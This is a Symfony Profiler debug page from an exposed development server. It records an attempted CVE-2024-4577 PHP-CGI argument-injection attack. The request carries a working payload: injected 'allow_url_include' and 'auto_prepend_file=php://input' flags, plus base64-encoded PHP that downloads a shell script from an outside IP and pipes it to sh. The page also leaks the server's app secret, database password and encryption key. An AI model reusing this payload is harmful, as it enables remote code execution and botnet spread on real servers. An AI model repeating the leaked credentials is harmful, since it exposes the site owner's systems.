Symfony Profiler

Settings

ErrorController

Request

GET Parameters

Key	Value
�d_allow_url_include=1_�d_auto_prepend_file=php://input	""

POST Parameters

Key	Value
<?php_shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTc4LjE2LjU1LjIyNC9zaCB8fCBjdXJsIC1zayBodHRwczovLzE3OC4xNi41NS4yMjQvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw"));_echo(md5("Hello_CVE-2024-4577"));_?>	""

Uploaded Files

No files were uploaded

Request Attributes

Key	Value
_controller	"error_controller"
_stopwatch_token	"10de4c"
exception	Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#232-statusCode: 404 -headers: [] #message: "No route found for "POST https://185.36.140.168/hello.world"" #code: 0 #file: "/var/www/privateMessage/vendor/symfony/http-kernel/EventListener/RouterListener.php" #line: 135 -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#209 …} trace: { /var/www/privateMessage/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 { Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) … › › throw new NotFoundHttpException($message, $e); › } catch (MethodNotAllowedException $e) { } /var/www/privateMessage/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 { Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void … › › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher); › } /var/www/privateMessage/vendor/symfony/event-dispatcher/EventDispatcher.php:230 { Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) … › } › $listener($event, $eventName, $this); › } } /var/www/privateMessage/vendor/symfony/event-dispatcher/EventDispatcher.php:59 { Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object … › if ($listeners) { › $this->callListeners($listeners, $eventName, $event); › } } /var/www/privateMessage/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 { Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object … › try { › $this->dispatcher->dispatch($event, $eventName); › } finally { } /var/www/privateMessage/vendor/symfony/http-kernel/HttpKernel.php:128 { Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response … › $event = new RequestEvent($this, $request, $type); › $this->dispatcher->dispatch($event, KernelEvents::REQUEST); › } /var/www/privateMessage/vendor/symfony/http-kernel/HttpKernel.php:74 { Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) … › try { › return $this->handleRaw($request, $type); › } catch (\Exception $e) { } /var/www/privateMessage/vendor/symfony/http-kernel/Kernel.php:202 { Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) … › try { › return $this->getHttpKernel()->handle($request, $type, $catch); › } finally { } /var/www/privateMessage/vendor/symfony/runtime/Runner/Symfony/HttpKernelRunner.php:35 { Symfony\Component\Runtime\Runner\Symfony\HttpKernelRunner->run(): int … › { › $response = $this->kernel->handle($this->request); › $response->send(); } /var/www/privateMessage/vendor/autoload_runtime.php:35 { require_once … › ->getRunner($app) › ->run() › ); } /var/www/privateMessage/public/index.php:5 { › › require_once dirname(__DIR__).'/vendor/autoload_runtime.php'; › arguments: { "/var/www/privateMessage/vendor/autoload_runtime.php" } } }}
logger	Symfony\Bridge\Monolog\Logger {#47 …6}

Request Headers

Header	Value
accept	"/"
connection	"keep-alive"
content-length	"241"
content-type	"application/x-www-form-urlencoded"
host	"185.36.140.168:443"
upgrade-insecure-requests	"1"
user-agent	"libredtail-http"
x-php-ob-level	"1"

Request Content

Raw

<?php shell_exec(base64_decode("KHdnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8tIGh0dHBzOi8vMTc4LjE2LjU1LjIyNC9zaCB8fCBjdXJsIC1zayBodHRwczovLzE3OC4xNi41NS4yMjQvc2gpIHwgc2ggLXMgY3ZlXzIwMjRfNDU3Ny5zZWxmcmVw")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header	Value
cache-control	"no-cache, private"
content-type	"text/html; charset=UTF-8"
date	"Sat, 21 Feb 2026 07:20:33 GMT"
x-debug-exception	"No%20route%20found%20for%20%22POST%20https%3A%2F%2F185.36.140.168%2Fhello.world%22"
x-debug-exception-file	"%2Fvar%2Fwww%2FprivateMessage%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token	"7f8492"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages

Stateless check enabled

Session not used.

Flashes

No flash messages were created.

Server Parameters

Defined in .env

Key	Value
APP_ENV	"dev"
APP_SECRET	"4e37ef78eb1a6f279a230e85ef9698b3"
DATABASE_URL	"postgresql://postgres:12@127.0.0.1:5432/privateMessage?serverVersion=13&charset=utf8"
DOMAIN	"https://test.knareq.xyz"
ENCRYPT_KEY	"6ed7e89df9a78b7d50df02a3qe54"
FIREWALL	"true"
MESSENGER_TRANSPORT_DSN	"doctrine://default?auto_setup=0"

Defined as regular env variables

Key	Value
APP_DEBUG	"1"
CONTENT_LENGTH	"241"
CONTENT_TYPE	"application/x-www-form-urlencoded"
DOCUMENT_ROOT	"/var/www/privateMessage/public"
DOCUMENT_URI	"/index.php"
FCGI_ROLE	"RESPONDER"
GATEWAY_INTERFACE	"CGI/1.1"
HOME	"/var/www"
HTTPS	"on"
HTTP_ACCEPT	"/"
HTTP_CONNECTION	"keep-alive"
HTTP_CONTENT_LENGTH	"241"
HTTP_CONTENT_TYPE	"application/x-www-form-urlencoded"
HTTP_HOST	"185.36.140.168:443"
HTTP_UPGRADE_INSECURE_REQUESTS	"1"
HTTP_USER_AGENT	"libredtail-http"
PHP_SELF	"/index.php"
QUERY_STRING	"%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS	"200"
REMOTE_ADDR	"47.77.185.216"
REMOTE_PORT	"47132"
REQUEST_METHOD	"GET"
REQUEST_SCHEME	"https"
REQUEST_TIME	1771658433
REQUEST_TIME_FLOAT	1771658433.7733
REQUEST_URI	"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME	"/var/www/privateMessage/public/index.php"
SCRIPT_NAME	"/index.php"
SERVER_ADDR	"185.36.140.168"
SERVER_NAME	"test.knareq.xyz"
SERVER_PORT	"443"
SERVER_PROTOCOL	"HTTP/1.1"
SERVER_SOFTWARE	"nginx/1.18.0"
SYMFONY_DOTENV_VARS	"APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,DATABASE_URL,DOMAIN,ENCRYPT_KEY,FIREWALL"
USER	"www-data"

Parent Request

Return to parent request (token = cbfaef)

Key	Value
_remove_csp_headers	true
_stopwatch_token	"44929f"

Symfony Profiler

https://185.36.140.168/hello.world?%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

Configuration Settings

Theme

Page Width

ErrorController

Request

GET Parameters

POST Parameters

Uploaded Files

Request Attributes

Request Headers

Request Content

Raw

Response

Response Headers

Cookies

Request Cookies

Response Cookies

Session

Session Metadata

Session Attributes

Session Usage

Flashes

Flashes

Server Parameters

Server Parameters

Defined in .env

Defined as regular env variables

Parent Request

Return to parent request (token = cbfaef)